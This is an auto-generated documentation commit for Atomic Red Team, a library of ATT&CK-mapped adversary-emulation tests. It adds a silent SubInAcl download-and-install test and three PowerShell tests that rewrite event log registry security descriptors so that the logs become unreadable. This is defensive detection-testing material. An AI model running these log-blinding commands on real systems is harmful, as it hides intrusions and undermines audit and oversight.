Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1678-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1682-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Indexes-CSV/index.csv

@@ -128,6 +128,7 @@ defense-evasion,T1222.001,File and Directory Permissions Modification: Windows F
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
+defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,6,SubInAcl Execution,a8568b10-9ab9-4140-a523-1c72e0176924,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
@@ -232,6 +233,9 @@ defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impai
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,8,Modify Event Log Channel Access Permissions via Registry - PowerShell,8e81d090-0cd6-4d46-863c-eec11311298f,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,9,Modify Event Log Channel Access Permissions via Registry 2 - PowerShell,85e6eff8-3ed4-4e03-ae50-aa6a404898a5,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,10,Modify Event Log Access Permissions via Registry - PowerShell,a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1,powershell
 defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -74,6 +74,7 @@ defense-evasion,T1222.001,File and Directory Permissions Modification: Windows F
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
+defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,6,SubInAcl Execution,a8568b10-9ab9-4140-a523-1c72e0176924,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
@@ -148,6 +149,9 @@ defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impai
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,8,Modify Event Log Channel Access Permissions via Registry - PowerShell,8e81d090-0cd6-4d46-863c-eec11311298f,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,9,Modify Event Log Channel Access Permissions via Registry 2 - PowerShell,85e6eff8-3ed4-4e03-ae50-aa6a404898a5,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,10,Modify Event Log Access Permissions via Registry - PowerShell,a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1,powershell
 defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -169,6 +169,7 @@
   - Atomic Test #3: attrib - Remove read-only attribute [windows]
   - Atomic Test #4: attrib - hide file [windows]
   - Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
+  - Atomic Test #6: SubInAcl Execution [windows]
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
   - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
@@ -295,6 +296,9 @@
   - Atomic Test #5: Clear Windows Audit Policy Config [windows]
   - Atomic Test #6: Disable Event Logging with wevtutil [windows]
   - Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
+  - Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell [windows]
+  - Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell [windows]
+  - Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell [windows]
 - [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
   - Atomic Test #1: Control Panel Items [windows]
 - T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -104,6 +104,7 @@
   - Atomic Test #3: attrib - Remove read-only attribute [windows]
   - Atomic Test #4: attrib - hide file [windows]
   - Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
+  - Atomic Test #6: SubInAcl Execution [windows]
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
   - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
@@ -199,6 +200,9 @@
   - Atomic Test #5: Clear Windows Audit Policy Config [windows]
   - Atomic Test #6: Disable Event Logging with wevtutil [windows]
   - Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
+  - Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell [windows]
+  - Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell [windows]
+  - Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell [windows]
 - [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
   - Atomic Test #1: Control Panel Items [windows]
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -6687,6 +6687,36 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: SubInAcl Execution
+      auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
+      description: This test simulates an adversary executing the Windows Resource
+        kit utility SubInAcl. This utility was abused by adversaries in the past in
+        order to modify access permissions. Upon execution, a process creation log
+        should be generated indicating successful execution.
+      supported_platforms:
+      - windows
+      input_arguments:
+        SubInAclDownloadPath:
+          type: string
+          default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
+          description: Download URL for SubInAcl
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Download subinacl
+
+          '
+        prereq_command: 'if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource
+          Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |-
+          New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
+          Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
+          msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
+      executor:
+        command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
+        name: command_prompt
+        elevation_required: true
   T1574.014:
     technique:
       modified: '2024-04-28T15:44:25.342Z'
@@ -11261,6 +11291,66 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: Modify Event Log Channel Access Permissions via Registry - PowerShell
+      auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
+          description: Path to the event log service channel to alter
+      executor:
+        command: "Set-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value
+          \"O:SYG:SYD:(D;;0x1;;;WD)\"\nRestart-Service -Name EventLog -Force -ErrorAction
+          Ignore "
+        cleanup_command: |-
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
+      auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
+          description: Path to the event log service channel to alter
+      executor:
+        command: |-
+          New-Item -Path #{ChannelPath} -Force
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        cleanup_command: |-
+          Remove-Item -Path #{ChannelPath} -Force
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Access Permissions via Registry - PowerShell
+      auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        CustomSDPath:
+          type: string
+          default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
+          description: Path to the event log service channel to alter
+      executor:
+        command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
+        cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
+        name: powershell
+        elevation_required: true
   T1218.002:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -5188,6 +5188,36 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: SubInAcl Execution
+      auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
+      description: This test simulates an adversary executing the Windows Resource
+        kit utility SubInAcl. This utility was abused by adversaries in the past in
+        order to modify access permissions. Upon execution, a process creation log
+        should be generated indicating successful execution.
+      supported_platforms:
+      - windows
+      input_arguments:
+        SubInAclDownloadPath:
+          type: string
+          default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
+          description: Download URL for SubInAcl
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Download subinacl
+
+          '
+        prereq_command: 'if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource
+          Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |-
+          New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
+          Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
+          msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
+      executor:
+        command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
+        name: command_prompt
+        elevation_required: true
   T1574.014:
     technique:
       modified: '2024-04-28T15:44:25.342Z'
@@ -8979,6 +9009,66 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: Modify Event Log Channel Access Permissions via Registry - PowerShell
+      auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
+          description: Path to the event log service channel to alter
+      executor:
+        command: "Set-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value
+          \"O:SYG:SYD:(D;;0x1;;;WD)\"\nRestart-Service -Name EventLog -Force -ErrorAction
+          Ignore "
+        cleanup_command: |-
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
+      auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
+          description: Path to the event log service channel to alter
+      executor:
+        command: |-
+          New-Item -Path #{ChannelPath} -Force
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        cleanup_command: |-
+          Remove-Item -Path #{ChannelPath} -Force
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Access Permissions via Registry - PowerShell
+      auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        CustomSDPath:
+          type: string
+          default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
+          description: Path to the event log service channel to alter
+      executor:
+        command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
+        cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
+        name: powershell
+        elevation_required: true
   T1218.002:
     technique:
       x_mitre_platforms:

atomics/T1222.001/T1222.001.md

@@ -18,6 +18,8 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as
 
 - [Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style](#atomic-test-5---grant-full-access-to-folder-for-everyone---ryuk-ransomware-style)
 
+- [Atomic Test #6 - SubInAcl Execution](#atomic-test-6---subinacl-execution)
+
 
 <br/>
 
@@ -261,4 +263,51 @@ icacls #{path} /save #{file_path} /t /q >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - SubInAcl Execution
+This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a8568b10-9ab9-4140-a523-1c72e0176924
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| SubInAclDownloadPath | Download URL for SubInAcl | string | https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Download subinacl
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
+Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
+msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
+```
+
+
+
+
 <br/>

atomics/T1222.001/T1222.001.yaml

@@ -141,6 +141,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 - name: SubInAcl Execution
+  auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
   description: |-
     This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.
   supported_platforms:

atomics/T1562.002/T1562.002.md

@@ -28,6 +28,12 @@ By disabling Windows event logging, adversaries can operate while leaving less e
 
 - [Atomic Test #7 - Makes Eventlog blind with Phant0m](#atomic-test-7---makes-eventlog-blind-with-phant0m)
 
+- [Atomic Test #8 - Modify Event Log Channel Access Permissions via Registry - PowerShell](#atomic-test-8---modify-event-log-channel-access-permissions-via-registry---powershell)
+
+- [Atomic Test #9 - Modify Event Log Channel Access Permissions via Registry 2 - PowerShell](#atomic-test-9---modify-event-log-channel-access-permissions-via-registry-2---powershell)
+
+- [Atomic Test #10 - Modify Event Log Access Permissions via Registry - PowerShell](#atomic-test-10---modify-event-log-access-permissions-via-registry---powershell)
+
 
 <br/>
 
@@ -312,4 +318,123 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Modify Event Log Channel Access Permissions via Registry - PowerShell
+This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8e81d090-0cd6-4d46-863c-eec11311298f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ChannelPath | Path to the event log service channel to alter | string | HKLM:&#92;SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;WINEVT&#92;Channels&#92;Microsoft-Windows-TaskScheduler/Operational|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+Restart-Service -Name EventLog -Force -ErrorAction Ignore
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
+Restart-Service -Name EventLog -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
+This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ChannelPath | Path to the event log service channel to alter | string | HKLM:&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Windows&#92;EventLog&#92;Setup|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-Item -Path #{ChannelPath} -Force
+Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+Restart-Service -Name EventLog -Force -ErrorAction Ignore
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path #{ChannelPath} -Force
+Restart-Service -Name EventLog -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Modify Event Log Access Permissions via Registry - PowerShell
+This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| CustomSDPath | Path to the event log service channel to alter | string | HKLM:&#92;SYSTEM&#92;CurrentControlSet&#92;Services&#92;EventLog&#92;System|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"
+```
+
+
+
+
+
 <br/>

atomics/T1562.002/T1562.002.yaml

@@ -146,6 +146,7 @@ atomic_tests:
       echo "Sorry you have to reboot"
     name: command_prompt
 - name: Modify Event Log Channel Access Permissions via Registry - PowerShell
+  auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
   description: |-
     This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
     Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
@@ -166,6 +167,7 @@ atomic_tests:
     name: powershell
     elevation_required: true
 - name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
+  auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
   description: |-
     This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
     Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
@@ -187,6 +189,7 @@ atomic_tests:
     name: powershell
     elevation_required: true
 - name: Modify Event Log Access Permissions via Registry - PowerShell
+  auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
   description: |-
     This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
